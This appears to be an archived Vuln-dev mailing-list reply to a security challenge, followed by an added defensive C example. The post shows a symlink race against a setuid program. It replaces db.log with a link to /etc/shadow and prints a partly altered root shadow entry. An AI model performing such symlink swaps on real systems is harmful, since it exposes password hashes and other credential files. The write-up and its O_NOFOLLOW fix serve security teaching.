Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Thomas Cannon <tcannon () noops org>
Date: Fri, 23 May 2003 16:48:08 -0700
/* read log */
if ( (f1 = fopen("db.log", "r")) == NULL) return 1;
if (fgets(bfp, BFSIZE, f1) == NULL) return 1;

...and if db.log is perhaps a symlink to /etc/shadow? I assumed the program would be chown'd to root and set 4755. If this is an invalid assumption, well, no point in reading any further. I compiled the program, stopped it after it wrote the input log, made a symlink, and resumed running the program, with lovely results:

[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::

I like race conditions. No point in wasting your CPU -- that shadowed password did get modified before I sent it to the list :-)

Cheers,
--tcannon

PS: Nice strcpy
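The defensive counterpart to the symlink swap described in this post, as an added example that is not part of the challenge code or the thread: the log is opened with O_NOFOLLOW so a symlink at the final path component is refused with ELOOP, and the opened descriptor is then checked with fstat (regular file, single link) before any read. The demo helper, file names and directory under /tmp are constructed for this example; note that O_NOFOLLOW only covers the last component, so a setuid program should still drop privileges or open from a trusted directory descriptor before touching user-controlled paths.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` read-only without following a symlink at the final
 * component, then verify the object actually opened is a plain regular
 * file with a single hard link. Returns an fd, or -1 with errno set. */
int open_log_nofollow(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                 /* ELOOP when path is a symlink */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;             /* checked after open: no TOCTOU gap */
        return -1;
    }
    return fd;
}

/* Constructed demo: create a regular log file and a symlink named
 * db.log pointing at it in a fresh temp dir, then probe both.
 * Returns 1 if the real file opened and the symlink was refused. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/dblogXXXXXX";
    if (mkdtemp(dir) == NULL) return 0;
    char reg[PATH_MAX], lnk[PATH_MAX];
    snprintf(reg, sizeof reg, "%s/real.log", dir);
    snprintf(lnk, sizeof lnk, "%s/db.log", dir);
    FILE *f = fopen(reg, "w");
    if (!f) return 0;
    fputs("constructed log line\n", f);
    fclose(f);
    if (symlink(reg, lnk) != 0) return 0;
    int ok = 1;
    int fd = open_log_nofollow(reg);   /* regular file: must succeed */
    if (fd < 0) ok = 0; else close(fd);
    fd = open_log_nofollow(lnk);       /* symlink: must be refused */
    if (fd >= 0) { ok = 0; close(fd); }
    unlink(lnk); unlink(reg); rmdir(dir);
    return ok;
}
```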